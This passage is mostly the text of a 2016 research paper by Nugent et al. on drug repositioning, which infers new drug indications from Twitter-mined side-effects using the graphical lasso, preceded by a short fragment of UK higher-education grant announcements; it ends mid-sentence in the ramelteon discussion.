part of the discipline workshop and seminar series for 2012-13. Grants of £750 are being offered to institutions wishing to host and deliver a workshop or seminar on teaching and learning in the Mathematics, Statistics and Operational Research discipline and to produce an associated report for the sector. In order to participate in the scheme a proposal form needs to be submitted to seminarseries@heacademy.ac.uk by 28 September 2012. The proposal form is available at http://www.heacademy.ac.uk/seminar-series, where more detailed information about the scheme can also be found. HEA Discipline Workshops and Seminars The next call for HEA teaching development grants opens on Tuesday 28 August. The call will be for departmental grants of up to £30,000, with a submission deadline on Thursday 27 September. 75% of the funding will be for projects in the areas of (i) assessment and feedback and (ii) flexible learning. The remaining 25% will be allocated to an open call for innovative pedagogic work. Details of the scheme can be found at http://www.heacademy.ac.uk/tdg. A further call for collaborative teaching development grants will open in January 2013. HEA Teaching Development Grants work_pmgmlohszzcrxlzdesctv3cf3y ---- Computational drug repositioning based on side-effects mined from social media Submitted 29 September 2015 Accepted 26 January 2016 Published 24 February 2016 Corresponding author Timothy Nugent, timnugent@gmail.com, tim.nugent@thomsonreuters.com Academic editor Sebastian Ventura Additional Information and Declarations can be found on page 18 DOI 10.7717/peerj-cs.46 Copyright 2016 Nugent et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Computational drug repositioning based on side-effects mined from social media Timothy Nugent, Vassilis Plachouras and Jochen L. Leidner Thomson Reuters, Corporate Research and Development, London, United Kingdom ABSTRACT Drug repositioning methods attempt to identify novel therapeutic indications for marketed drugs. Strategies include the use of side-effects to assign new disease indications, based on the premise that both therapeutic effects and side-effects are measurable physiological changes resulting from drug intervention. Drugs with similar side-effects might share a common mechanism of action linking side-effects with disease treatment, or may serve as a treatment by “rescuing” a disease phenotype on the basis of their side-effects; therefore it may be possible to infer new indications based on the similarity of side-effect profiles. While existing methods leverage side-effect data from clinical studies and drug labels, evidence suggests this information is often incomplete due to under-reporting. Here, we describe a novel computational method that uses side-effect data mined from social media to generate a sparse undirected graphical model using inverse covariance estimation with ℓ1-norm regularization. Results show that known indications are well recovered while current trial indications can also be identified, suggesting that sparse graphical models generated using side-effect data mined from social media may be useful for computational drug repositioning. Subjects Bioinformatics, Data Mining and Machine Learning, Computational Biology, Social Computing Keywords Drug repositioning, Drug repurposing, Side-effect, Adverse drug reaction, Social media, Graphical model, Graphical lasso, Inverse covariance estimation INTRODUCTION Drug repositioning is the process of identifying novel therapeutic indications for marketed drugs. Compared to traditional drug development, repositioned drugs have the advantage of decreased development time and costs given that significant pharmacokinetic, toxicology and safety data will have already been accumulated, drastically reducing the risk of attrition during clinical trials. In addition to marketed drugs, it is estimated that drug libraries may contain upwards of 2,000 failed drugs that have the potential to be repositioned, with this number increasing at a rate of 150–200 compounds per year (Jarvis, 2006). Repositioning of marketed or failed drugs has opened up new sources of revenue for pharmaceutical companies with estimates suggesting the market could generate multi-billion dollar annual sales in coming years (Thomson Reuters, 2012; Tobinick, 2009). While many of the current successes of drug repositioning have come about through serendipitous clinical observations, systematic data-driven approaches are now showing increasing promise given their ability to generate repositioning hypotheses How to cite this article Nugent et al. (2016), Computational drug repositioning based on side-effects mined from social media. PeerJ Comput. Sci. 2:e46; DOI 10.7717/peerj-cs.46 mailto:timnugent@gmail.com mailto:tim.nugent@thomsonreuters.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.46 http://dx.doi.org/10.7717/peerj-cs.46 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.46 for multiple drugs and diseases simultaneously using a wide range of data sources, while also incorporating prioritisation information to further accelerate development time (Hurle et al., 2013). Existing computational repositioning strategies generally use similar approaches but attempt to link different concepts. They include the use of transcriptomics methods which compare drug response gene-expression with disease gene-expression signatures (Lamb et al., 2006; Hu & Agarwal, 2009; Iorio et al., 2010; Sirota et al., 2011; Dudley et al., 2011), genetics-based methods which connect a known drug target with a genetically associated phenotype (Franke et al., 2010; Zhang et al., 2015; Wang & Zhang, 2013; Sanseau et al., 2012; Wang et al., 2015), network-based methods which link drugs or diseases in a network based on shared features (Krauthammer et al., 2004; Barabasi, Gulbahce & Loscalzo, 2011; Kohler et al., 2008; Vanunu et al., 2010; Emig et al., 2013), and methods that use side-effect similarity to infer novel indications (Campillos et al., 2008; Yang & Agarwal, 2011; Zhang et al., 2013; Cheng et al., 2013; Bisgin et al., 2012; Duran-Frigola & Aloy, 2012; Wang et al., 2014; Ye, Liu & Wei, 2014). Drug side-effects can be attributed to a number of molecular interactions including on or off-target binding, drug–drug interactions (Vilar et al., 2014; Tatonetti et al., 2012), dose-dependent pharmacokinetics, metabolic activities, downstream pathway perturbations, aggregation effects, and irreversible target binding (Xie et al., 2012; Campillos et al., 2008). While side-effects are considered the unintended consequence of drug intervention, they can provide valuable insight into the physiological changes caused by the drug that are difficult to predict using pre-clinical or animal models. This relationship between drugs and side-effects has been exploited and used to identify shared target proteins between chemically dissimilar drugs, allowing new indications to be inferred based on the similarity of side-effect profiles (Campillos et al., 2008). One rationale behind this and related approaches is that drugs sharing a significant number of side-effects might share a common mechanism of action linking side-effects with disease treatment—side-effects essentially become a phenotypic biomarker for a particular disease (Yang & Agarwal, 2011; Duran-Frigola & Aloy, 2012). Repositioned drugs can also be said to “rescue” a disease phenotype, on the basis of their side-effects; for example, drugs which cause hair growth as a side-effect can potentially be repositioned for the treatment of hair loss, while drugs which cause hypotension as a side-effect can be used to treat hypertension (Yang & Agarwal, 2011). Examples of drugs successfully repositioned based on phenotypic rescue that have made it to market include exenatide, which was shown to cause significant weight loss as a side-effect of type 2 diabetes treatment, leading to a trial of its therapeutic effect in non-diabetic obese subjects (Buse et al., 2004; Ladenheim, 2015), minoxidil which was originally developed for hypertension but found to cause hair growth as a side-effect, leading to its repositioning for the treatment of hair loss and androgenetic alopecia (Shorter et al., 2008; Li et al., 2001), and, perhaps most famously, sildenafil citrate which was repositioned while being studied for the primary indication of angina to the treatment of erectile dysfunction (Ghofrani, Osterloh & Grimminger, 2006). Existing repositioning methods based on side-effects, such as the work of Campillos et al. (2008) and Yang & Agarwal (2011), have used data from the SIDER database (Kuhn Nugent et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.46 2/24 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.46 et al., 2010), which contains side-effect data extracted from drug labels, largely collected from clinical trials during the pre-marketing phase of drug development. Other resources include Meyler’s Side Effects of Drugs (Aronson, 2015), which is updated annually in the Side Effects of Drugs Annual (Ray, 2014), and the Drugs@FDA database (US Food and Drug Administraction, 2016), while pharmacovigilance authorities attempt to detect, assess and monitor reported drug side-effects post-market. Despite regular updates to these resources and voluntary reporting systems, there is evidence to suggest that side-effects are substantially under-reported, with some estimates indicating that up to 86% of adverse drug reactions go unreported for reasons that include lack of incentives, indifference, complacency, workload and lack of training among healthcare professionals (Backstrom, Mjorndal & Dahlqvist, 2004; Lopez-Gonzalez, Herdeiro & Figueiras, 2009; Hazell & Shakir, 2006; Tandon et al., 2015). Side-effects reported from clinical trials also have limitations due to constraints on scale and time, as well as pharmacogenomic effects (Evans & McLeod, 2003). A number of cancer drug studies have also observed that women are often significantly under-represented in clinical trials, making it difficult to study the efficacy, dosing and side-effects of treatments which can work differently in women and men; similar problems of under-representation also affect paediatrics, as many drugs are only ever tested on adults (Jones, 2009). Recently, efforts to mine user-generated content and social media for public-health issues and side-effects have shown promising performance, demonstrating correlations between the frequency of side-effects extracted from unlabelled data and the frequency of documented adverse drug reactions (Leaman et al., 2010). Despite this success, a number of significant natural language processing challenges remain. These include dealing with idiomatic expressions, linguistic variability of expression and creativity, ambiguous terminology, spelling errors, word shortenings, and distinguishing between the symptoms that a drug is treating and the side-effects it causes. Some of the solutions proposed to deal with these issues include the use of specialist lexicons, appropriate use of semantic analysis, and improvements to approximate string matching, modeling of spelling errors, and contextual analysis surrounding the mentions of side-effects (Leaman et al., 2010; Segura- Bedmar et al., 2015), while maintaining a list of symptoms for which a drug is prescribed can help to eliminate them from the list of side-effects identified (Sampathkumar, Chen & Luo, 2014). Although much of the focus has explored the use of online forums where users discuss their experience with pharmaceutical drugs and report side-effects (Chee, Berlin & Schatz, 2011), the growing popularity of Twitter (2015), which at the time of writing has over 300 million active monthly users, provides a novel resource upon which to perform large-scale mining of reported drug side-effects in near real-time from the 500 millions tweets posted daily (Internet Live Stats, 2015). While only a small fraction of these daily tweets are related to health issues, the sheer volume of data available presents an opportunity to bridge the gap left by conventional side-effects reporting strategies. Over time, the accumulation of side-effect data from social media may become comparable or even exceed the volume of traditional resources, and at the very least should be sufficient to Nugent et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.46 3/24 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.46 augment existing databases. Additionally, the cost of running such a system continuously is relatively cheap compared to existing pharmacovigilance monitoring, presenting a compelling economic argument supporting the use of social media for such purposes. Furthermore, the issues related to under-representation described above may be addressed. Freifeld et al. (2014) presented a comparison study between drug side-effects found on Twitter and adverse events reported in the FDA Adverse Event Reporting System (FAERS). Starting with 6.9 million tweets, they used a set of 23 drug names and a list of symptoms to reduce that data to a subset of 60,000 tweets. After manual examination, there were 4,401 tweets identified as mentioning a side-effect, with a Spearman rank correlation found to be 0.75. Nikfarjam et al. (2015) introduce a method based on Conditional Random Fields (CRF) to tag mentions of drug side-effects in social media posts from Twitter or the online health community DailyStrength. They use features based on the context of tokens, a lexicon of adverse drug reactions, Part-Of-Speech (POS) tags and a feature indicating whether a token is negated or not. They also used embedding clusters learned with Word2Vec (Mikolov et al., 2013). They reported an F1 score of 82.1% for data from DailyStrength and 72.1% for Twitter data. Sarker & Gonzalez (2015) developed classifiers to detect side-effects using training data from multiple sources, including tweets (Ginn et al., 2014), DailyStrength, and a corpus of adverse drug events obtained from medical case reports. They reported an F1 score of 59.7% when training a Support Vector Machine (SVM) with Radial Basis Function (RBF) kernel on all three datasets. Recently, Karimi et al. (2015) presented a survey of the field of surveillance for adverse drug events with automatic text and data mining techniques. In this study, we describe a drug repositioning methodology that uses side-effect data mined from social media to infer novel indications for marketed drugs. We use data from a pharmacovigilance system for mining Twitter for drug side-effects (Plachouras, Leidner & Garrow, under review). The system uses a set of cascading filters to eliminate large quantities of irrelevant messages and identify the most relevant data for further processing, before applying a SVM classifier to identify tweets that mention suspected adverse drug reactions. Using this data we apply sparse inverse covariance estimation to construct an undirected graphical model, which offers a way to describe the relationship between all drug pairs (Meinshausen & Bühlmann, 2006; Friedman, Hastie & Tibshirani, 2008; Banerjee, ElGhaoui & d’Aspremont, 2008). This is achieved by solving a maximum likelihood problem using ℓ1-norm regularization to make the resulting graph as sparse as possible, in order to generate the simplest graphical model which fully explains the data. Results from testing the method on known and proposed trial indication recovery suggest that side-effect data mined from social media in combination with a regularized sparse graphical model can be used for systematic drug repositioning. METHODS Mining Twitter for drug side-effects We used the SoMeDoSEs pharmacovigilance system (Plachouras, Leidner & Garrow, under review) to extract reports of drug side-effects from Twitter over a 6 month period between Nugent et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.46 4/24 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.46 January and June 2014. SoMeDoSEs works by first applying topic filters to identify tweets that contain keywords related to drugs, before applying volume filters which remove tweets that are not written in English, are re-tweets or contain a hyperlink to a web page, since these posts are typically commercial offerings. Side-effects were then mapped to an entry in the FDA Adverse Event Reporting System. Tweets that pass these filters are then classified by a linear SVM to distinguish those that mention a drug side-effect from those that do not. The SVM classifier uses a number of natural language features including unigrams and bigrams, part-of-speech tags, sentiment scores, text surface features, and matches to gazetteers related to human body parts, side-effect synonyms, side-effect symptoms, causality indicators, clinical trials, medical professional roles, side effect-triggers and drugs. For each gazetteer, three features were created: a binary feature, which is set to 1 if a tweet contains at least one sequence of tokens matching an entry from the gazetteer, the number of tokens matching entries from the gazetteer, and the fraction of characters in tokens matching entries from the gazetteer. For side-effect synonyms we used the Consumer Health Vocabulary (CHV) (Zeng et al., 2005), which maps phrases to Unified Medical Language System concept universal identifiers (CUI) and partially addresses the issue of misspellings and informal language used to discuss medical issues in tweets. The matched CUIs were also used as additional features. To develop the system, 10,000 tweets which passed the topic and volume filters were manually annotated as mentioning a side-effect or not, resulting in a Cohen’s Kappa for inter-annotator agreement on a sample of 404 tweets annotated by two non-healthcare professional of 0.535. Using a time-based split of 8,000 tweets for training, 1,000 for development, and 1,000 for testing, the SVM classifier that used all the features achieved a precision of 55.0%, recall of 66.9%, and F1 score of 60.4% when evaluated using the 1,000 test tweets. This is statistically significantly higher than the results achieved by a linear SVM classifier using only unigrams and bigrams as features (precision of 56.0%, recall of 54.0% and F1 score of 54.9%). One of the sources of false negatives was the use of colloquial and indirect expressions by Twitter users to express that they have experienced a side-effect. We also observed that a number of false positives discuss the efficacy of drugs rather than side-effects. Twitter data Over the 6 month period, SoMeDoSEs typically identified ∼700 tweets per day that mentioned a drug side-effect, resulting in a data set of 620 unique drugs and 2,196 unique side-effects from 108,009 tweets, once drugs with only a single side-effect were excluded and drug synonyms had been resolved to a common name using exact string matches to entries in World Drug Index (Thomson Reuters, 2015b), which worked for approximately half of the data set with the remainder matched manually. We were also careful to remove indications that were falsely identified as side-effects using drug indications from Cortellis Clinical Trials Intelligence (Thomson Reuters, 2015a). We used this data to construct a 2,196 row by 620 column matrix of binary variables X, where x∈{0,1}, indicating whether each drug was reported to cause each side-effect in the Twitter data set. Nugent et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.46 5/24 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.46 Calculating the sample covariance matrix Using this data, we are able to form the sample covariance matrix S for binary variables as follows (Allen, 1997), such that element Si,j gives the covariance of drug i with drug j: Si,j = 1 n−1 n k=1 (xki − x̄i)(xkj − x̄j) = 1 n−1 n k=1 xkixkj − x̄ix̄j (1) where x̄i = 1 n n k=1 xki and xki is the k-th observation (side-effect) of variable (drug) Xi. It can be shown than the average product of two binary variables is equal to their observed joint probabilities such that: 1 n−1 n k=1 xkixkj = P(Xj = 1|Xi = 1) (2) where P(Xj = 1|Xi = 1) refers to the conditional probability that variable Xj equals one given that variable Xi equals one. Similarly, the product of the means of two binary variables is equal to the expected probability that both variables are equal to one, under the assumption of statistical independence: x̄ix̄j = P(Xi = 1)P(Xj = 1). (3) Consequently, the covariance of two binary variables is equal to the difference between the observed joint probability and the expected joint probability: Si,j = P(Xj = 1|Xi = 1)−P(Xi = 1)P(Xj = 1). (4) Our objective is to find the precision or concentration matrix θ by inverting the sample covariance matrix S. Using θ , we can obtain the matrix of partial correlation coefficients ρ for all pairs of variables as follows: ρi,j =− θi,j θi,iθj,j . (5) The partial correlation between two variables X and Y given a third, Z, can be defined as the correlation between the residuals Rx and Ry after performing least-squares regression of X with Z and Y with Z, respectively. This value, denotated ρx,y|z , provides a measure of the correlation between two variables when conditioned on the third, with a value of zero implying conditional independence if the input data distribution is multivariate Gaussian. The partial correlation matrix ρ, however, gives the correlations between all pairs of variables conditioning on all other variables. Off-diagonal elements in ρ that are significantly different from zero will therefore be indicative of pairs of drugs that show unique covariance between their side-effect profiles when taking into account (i.e., removing) the variance of side-effects profiles amongst all the other drugs. Nugent et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.46 6/24 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.46 Shrinkage estimation For the sample covariance matrix to be easily invertible, two desirable characteristics are that it should be positive definite, i.e., all eigenvalues should be distinct from zero, and well-conditioned, i.e., the ratio of its maximum and minimum singular value should not be too large. This can be particularly problematic when the sample size is small and the number of variables is large (n < p) and estimates of the covariance matrix become singular. To ensure these characteristics, and speed up convergence of the inversion, we condition the sample covariance matrix by shrinking towards an improved covariance estimator T, a process which tends to pull the most extreme coefficients towards more central values thereby systematically reducing estimation error (Ledoit & Wolf, 2003), using a linear shrinkage approach to combine the estimator and sample matrix in a weighted average: S′= αT +(1−α)S (6) where α ∈ {0,1} denotes the analytically determined shrinkage intensity. We apply the approach of Schäfer and Strimmer, which uses a distribution-free, diagonal, unequal variance model which shrinks off-diagonal elements to zero but leaves diagonal entries intact, i.e., it does not shrink the variances (Schäfer & Strimmer, 2005). Shrinkage is actually applied to the correlations rather than the covariances, which has two distinct advantages: the off-diagonal elements determining the shrinkage intensity are all on the same scale, while the partial correlations derived from the resulting covariance estimator are independent of scale. Graphical lasso for sparse inverse covariance estimation A useful output from the covariance matrix inversion is a sparse ρ matrix containing many zero elements, since, intuitively, we know that relatively few drug pairs will share a common mechanism of action, so removing any spurious correlations is desirable and results in a more parsimonious relationship model, while the non-zero elements will typically reflect the correct positive correlations in the true inverse covariance matrix more accurately (Jones et al., 2012). However, elements of ρ are unlikely to be zero unless many elements of the sample covariance matrix are zero. The graphical lasso (Friedman, Hastie & Tibshirani, 2008; Banerjee, ElGhaoui & d’Aspremont, 2008; Hastie, Tibshirani & Wainwright, 2015) provides a way to induce zero partial correlations in ρ by penalizing the maximum likelihood estimate of the inverse covariance matrix using an ℓ1-norm penalty function. The estimate can be found by maximizing the following log-likelihood using the block coordinate descent approach described by Friedman, Hastie & Tibshirani (2008): logdetθ − tr(S′θ )−λ∥θ∥1. (7) Here, the first term is the Gaussian log-likelihood of the data, tr denotes the trace operator and ∥θ∥1 is the ℓ1-norm—the sum of the absolute values of the elements of θ , weighted by the non-negative tuning paramater λ. The specific use of the ℓ1-norm penalty has the Nugent et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.46 7/24 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.46 desirable effect of setting elements in θ to zero, resulting in a sparse matrix, while the parameter λ effectively controls the sparsity of the solution. This contrasts with the use of an ℓ2-norm penalty which will shrink elements but will never reduce them to zero. While this graphical lasso formulation is based on the assumption that the input data distribution is multivariate Gaussian, Banerjee, ElGhaoui & d’Aspremont (2008) showed that the dual optimization solution also applies to binary data, as is the case in our application. It has been noted that the graphical lasso produces an approximation of θ that is not symmetric, so we update it as follows (Sustik & Calderhead, 2012): θ ← (θ +θ T ) 2 . (8) The matrix ρ is then calculated according to Eq. (5), before repositioning predictions for drug i are determined by ranking all other drugs according to their absolute values in ρi and assigning their indications to drug i. RESULTS AND DISCUSSION Recovering known indications To evaluate our method we have attempted to predict repositioning targets for indications that are already known. If, by exploiting hindsight, we can recover these, then our method should provide a viable strategy with which to augment existing approaches that adopt an integrated approach to drug repositioning (Emig et al., 2013). Figure 1A shows the performance of the method at identifying co-indicated drugs at a range of λ values, resulting in different sparsity levels in the resulting ρ matrix. We measured the percentage at which a co-indicated drug was ranked amongst the top 5, 10, 15, 20 and 25 predictions for the target drug, respectively. Of the 620 drugs in our data set, 595 had a primary indication listed in Cortellis Clinical Trials Intelligence, with the majority of the remainder being made up of dietary supplements (e.g., methylsulfonylmethane) or plant extracts (e.g., Agaricus brasiliensis extract) which have no approved therapeutic effect. Rather than removing these from the data set, they were left in as they may contribute to the partial correlation between pairs of drugs that do have approved indications. Results indiciate that the method achieves its best performance with a λ value of 10−9 where 42.41% (243/595) of targets have a co-indicated drug returned amongst the top 5 ranked predictions (Fig. 1A). This value compares favourably with both a strategy in which drug ranking is randomized (13.54%, standard error ±0.65), and another in which drugs are ranked according to the Jaccard index (28.75%). In Ye, Liu & Wei (2014), a related approach is used to construct a repositioning network based on side-effects extracted from the SIDER database, Meyler’s Side Effects of Drugs, Side Effects of Drugs Annual, and the Drugs@FDA database (Kuhn et al., 2010; Aronson, 2015; Ray, 2014; US Food and Drug Administraction, 2016), also using the Jaccard index as the measure of drug–drug similarity. Here, they report an equivilent value of 32.77% of drugs having their indication correctly predicted amongst the top 5 results. While data sets and underlying statistical models clearly differ, these results taken together suggest that the use of side-effect data mined from Nugent et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.46 8/24 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.46 Figure 1 Recovery of known indications. (A) Percentage at which a co-indicated drug is returned amongst the top 5, 10, 15, 20 and 25 ranked predictions for a given target, at different λ values—the parameter that weights the ℓ1-norm penalty in the graphical lasso (Eq. (7)). (B) Sparsity of ρ matrix at different λ values, i.e., the number of non-zero elements in the upper triangle divided by (n2 −n)/2. social media can certainly offer comparable performance to methods using side-effect data extracted from more conventional resources, while the use of a global statistical model such as the graphical lasso does result in improved performance compared to a pairwise similarity coefficient such as the Jaccard index. To further investigate the influence of the provenance of the data, we mapped our data set of drugs to ChEMBL identifiers (Gaulton et al., 2012; Bento et al., 2014) which we then used to query SIDER for side-effects extracted from drug labels. This resulted in a reduced data set of 229 drugs, in part due to the absence of many combination drugs from SIDER (e.g. the antidepressant Symbyax which contains olanzapine and fluoxetine). Using the same protocol described above, best performance of 53.67% (117/229) was achieved with a slightly higher λ value of 10−6. Best performance on the same data set using side-effects derived from Twitter was 38.43% (88/229), again using a λ value of 10−9, while the randomized strategy achieved 12.05% (standard error ± 1.14), indicating that the use of higher quality side-effect data from SIDER allows the model to achieve better performance than is possible using Twitter data. Perhaps more interestingly, combining the correct predictions between the two datasources reveals that 30 are unique to the Twitter model, 59 are unique to the SIDER model, with 58 shared, supporting the use side-effect data mined from social media to augment conventional resources. We also investigated whether our results were biased by the over-representation of particular drug classes within our data set. Using Using Cortellis Clinical Trials Intelligence, we were able to identify the broad class for 479 of the drugs (77.26%) in our data set. The five largest classes were benzodiazepine receptor agonists (3/14 drugs returned amongst the top 5 ranked predictions), analgesics (6/12), H1-antihistamines (8/11), cyclooxygenase inhibitors (9/11), and anti-cancer (2/11). This indicates that the over-representation of H1-antihistamines and cyclooxygenase inhibitors did result in a bias, and to a lesser extent analgesics, but that the overall effect of these five classes was more subtle (28/59 returned amongst the top 5 ranked predictions, 47.46%). Nugent et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.46 9/24 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.46 Figure 2 The overall layout of the side-effect network. Drugs are yellow, connecting edges are green. The layout is performed using a relative entropy optimization-based method (Kovács, Mizsei & Csermely, 2014). In total, there are 616 connected nodes, with each having an average of 267 neighbours. Painkillers such as paracetamol and ibuprofen have the highest number of connections (587 and 585, respectively), which corresponds to them having the largest number of unique side-effects (256 and 224) reported on Twitter. The strongest connection is between chondroitin and glucosamine (partial correlation coefficient (PCC) 0.628), both of which are dietary supplements used to treat osteoarthritis, closely followed by the antidepressant and anxiolytic agents phenelzine and tranylcypromine (PCC 0.614). The best performance of our approach at the top 5 level is achieved when the resulting ρ matrix has a sparsity of 35.59% (Figs. 1B and 2) which both justifies the use of the ℓ1-norm penalized graphical lasso, and generates a graphical model with approximately a third of the parameters of a fully dense matrix, while the comparable performance at λ values between 10−12 and 10−7 also indicates a degree of robustness to the choice of this parameter. Beyond the top 5 ranked predictions, results are encouraging as the majority of targets (56.02%) will have a co-indicated drug identified by considering only the top 10 predictions, suggesting the method is a feasible strategy for prioritisation of repositioning candidates. Predicting proposed indications of compounds currently in clinical trials While the previous section demonstrated our approach can effectively recover known indications, predictions after the fact are—while useful—best supported by more forward-looking evidence. In this section, we use clinical trial data to support our predictions where the ultimate success of our target drug is still unknown. Using Cortellis Clinical Trials Intelligence, we extracted drugs present in our Twitter data set that were currently undergoing clinical trials (ending after 2014) for a novel indication (i.e., for Nugent et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.46 10/24 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.46 Figure 3 Recovery of proposed clinical trial indications. Percentage at which a co-indicated drug is returned amongst the top 5, 10, 15, 20 and 25 ranked predictions for a given target, at different λ values. which they were not already indicated), resulting in a subset of 277 drugs currently in trials for 397 indications. Figure 3 shows the percentage at which a co-indicated drug was ranked amongst the top 5, 10, 15, 20 and 25 predictions for the target. Similar to the recovery of known indications, best performance when considering the top 5 ranked predictions was achieved with a λ value of 10−9, resulting in 16.25% (45/277) of targets having a co-indicated drug, which again compares well to a randomized strategy (5.42%, standard error±0.32) or a strategy using the Jaccard index (10.07%). Recovery of proposed clinical trial indications is clearly more challenging than known indications, possibly reflecting the fact that a large proportion of drugs will fail during trials and therfore many of the 397 proposed indications analysed here will in time prove false, although the general trend in performance as the sparsity parameter λ is adjusted tends to mirror the recovery of known indications. Despite this, a number of interesting predictions with a diverse range of novel indications are made that are supported by exper- imental and clinical evidence; a selection of 10 of the 45 drugs where the trial indication was correctly predicted are presented in Table 1. We further investigated three reposition- ing candidates with interesting pharmacology to understand their predicted results. Oxytocin Oxytocin is a nonapeptide hormone that acts primarily as a neuromodulator in the brain via the specific, high-affinity oxytocin receptor—a class I (Rhodopsin-like) G-protein- coupled receptor (GPCR) (Gimpl et al., 2002). Currently, oxytocin is used for labor induction and the treatment of Prader-Willi syndrome, but there is compelling pre-clinical evidence to suggest that it may play a crucial role in the regulation of brain-mediated processes that are highly relevant to many neuropsychiatric disorders (Feifel, 2012). Nugent et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.46 11/24 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.46 Table 1 Predicted indications for drugs currently in clinical trials. A selection of drugs which are currently in clinical trials for a new indication, and have a co-indicated drug (“Evidence”) ranked amongst the top 5 predictions. “PCC” is the absolute partial correlation coefficient, “ID” is the Cortellis Clinical Trials Intelligence identifier. Average PCC scores for co-indicated drugs ranked amongst the top 5, 10, 15, 20 and 25 positions were 0.162, 0.0804, 0.0620, 0.0515, and 0.0468, respectively. Drug Current indication New indication Evidence PCC Rank ID Title Ramelteon Insomnia Bipolar I disorder Ziprasidone 0.197 2 6991 Ramelteon for the treatment of insomnia and mood stability in patients with euthymic bipolar disorder Denosumab Osteoporosis Breast cancer Capecitabine 0.133 3 85503 Pilot study to evaluate the impact of denosumab on disseminated tumor cells (DTC) in patients with early stage breast cancer Meloxicam Inflammation Non-Hodgkin lymphoma Rituximab 0.131 1 176379 A phase II trial using meloxicam plus filgrastim in patients with multiple myeloma and non-Hodgkins lymphoma Sulfasalazine Rheumatoid arthritis Diarrhea Loperamide 0.106 5 155516 Sulfasalazine in preventing acute diarrhea in patients with cancer who are undergoing pelvic radiation therapy Pyridostigmine Myasthenia gravis Cardiac failure Digitoxin 0.100 4 190789 Safety study of pyridostigmine in heart failure Alprazolam Anxiety disorder Epilepsy Clonazepam 0.097 4 220920 Staccato alprazolam and EEG photoparoxysmal response Oxytocin Prader-Willi syndrome Schizophrenia Chlorpromazine 0.096 3 163871 Antipsychotic effects of oxytocin Interferon alfa Leukemia Thrombocythemia Hydroxyurea 0.094 3 73064 Pegylated interferon Alfa-2a salvage therapy in high-risk polycythemia vera (PV) or essential thrombocythemia (ET) Etomidate General anesthesia Depression Trazodone 0.091 5 157982 Comparison of effects of propofol and etomidate on rate pressure product and oxygen saturation in patients undergoing electroconvulsive therapy Guaifenesin Respiratory tract infections Rhinitis Ipratropium 0.090 5 110111 The effect of oral Guaifenesin on pediatric chronic rhinitis: a pilot study N u g e n t e t a l. (2 0 1 6 ), P e e rJ C o m p u t. S c i., D O I 1 0 .7 7 1 7 /p e e rj-c s .4 6 1 2 /2 4 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.46 A number of animal studies have revealed that oxytocin has a positive effect as an antipsychotic (Feifel & Reza, 1999; Lee et al., 2005), while human trials have revealed that intranasal oxytocin administered to highly symptomatic schizophrenia patients as an adjunct to their antipsychotic drugs improves positive and negative symptoms significantly more than placebo (Feifel et al., 2010; Pedersen et al., 2011). These therapeutic findings are supported by growing evidence of oxytocin’s role in the manifestation of schizophrenia symptoms such as a recent study linking higher plasma oxytocin levels with increased pro-social behavior in schizophrenia patients and with less severe psychopathology in female patients (Rubin et al., 2010). The mechanisms underlying oxytocin’s therapeutic effects on schizophrenia symptoms are poorly understood, but its ability to regulate mesolimbic dopamine pathways are thought to be responsible (Feifel, 2012). Here, our method predicts schizophrenia as a novel indication for oxytocin based on its proximity to chlorpromazine, which is currently used to treat schizophrenia (Fig. 4). Chlorpromazine also modulates the dopamine pathway by acting as an antagonist of the dopamine receptor, another class I GPCR. Interestingly, the subgraph indicates that dopamine also has a high partial correlation coefficient with oxytocin, adding further support to the hypothesis that oxytocin, chlorpromazine and dopamine all act on the same pathway and therefore have similar side-effect profiles. Side-effects shared by oxytocin and chlorpromazine include hallucinations, excessive salivation and anxiety, while shivering, weight gain, abdominal pain, nausea, and constipation are common side-effects also shared by other drugs within the subgraph. Currently, larger scale clinical trials of intranasal oxytocin in schizophrenia are underway. If the early positive results hold up, it may signal the beginning of an new era in the treatment of schizophrenia, a field which has seen little progress in the development of novel efficacious treatments over recent years. Ramelteon Ramelteon, currently indicated for the treatment of insomnia, is predicted to be useful for the treatment of bipolar depression (Fig. 5). Ramelteon is the first in a new class of sleep agents that selectively binds the MT1 and MT2 melatonin receptors in the suprachiasmatic nucleus, with high affinity over the MT3 receptor (Owen, 2006). It is believed that the activity of ramelteon at MT1 and MT2 receptors contributes to its sleep-promoting properties, since these receptors are thought to play a crucial role in the maintenance of the circadian rhythm underlying the normal sleep-wake cycle upon binding of endogenous melatonin. Abnormalities in circadian rhythms are prominent features of bipolar I disorder, with evidence suggesting that disrupted sleep-wake circadian rhythms are associated with an increased risk of relapse in bipolar disorder (Jung et al., 2014). As bipolar patients tend to exhibit shorter and more variable circadian activity, it has been proposed that normalisation of the circadian rhythm pattern may improve sleep and consequently lead to a reduction in mood exacerbations. Melatonin receptor agonists such as ramelteon may have a potential therapeutic effect in depression due to their ability to resynchronize the suprachiasmatic nucleus (Wu et al., 2013). In Fig. 5, evidence supporting the repositioning of ramelteon comes from ziprasidone, an atypical antipsychotic used to treat bipolar I disorder and 